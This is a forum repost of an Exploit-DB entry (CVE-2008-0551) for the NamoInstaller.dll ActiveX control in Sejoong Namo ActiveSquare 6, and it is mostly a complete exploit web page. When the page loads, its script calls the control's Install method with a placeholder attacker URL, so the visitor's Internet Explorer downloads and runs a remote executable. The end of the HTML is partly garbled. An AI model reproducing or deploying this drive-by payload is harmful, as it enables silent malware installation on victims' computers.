Exploit Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' install Method

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4986
Проверка EDB
  1. Пройдено
Автор
PLAN-S
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2008-0551
Дата публикации
2008-01-25
HTML:
<!-- 
Sejoong Namo ActiveSquare 6 NamoInstaller.dll install Method Exploit

Written by http://www.Plan-S.cn
Tested on Windows XP SP2(fully patched) Korean, IE6, NamoInstaller.dll version 3,0,0,1 
-->



<html>
 <head>
<html>
 <head>
  <title>Namo Web Editor NamoInstaller.dll install Method Exploit</title>
  <script language="JavaScript" defer>
    function Check() 
   {
     	 obj.Install("http://ATTACKER.COM/HACK.EXE")           
          
    } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:AF465549-1D22-4140-A273-386FA8877E0A" height="0" width="0">
     Unable to create object
    </object>
 </body>
</html>

tml>

-->

# milw0rm.com [2008-01-25]
 
Источник
www.exploit-db.com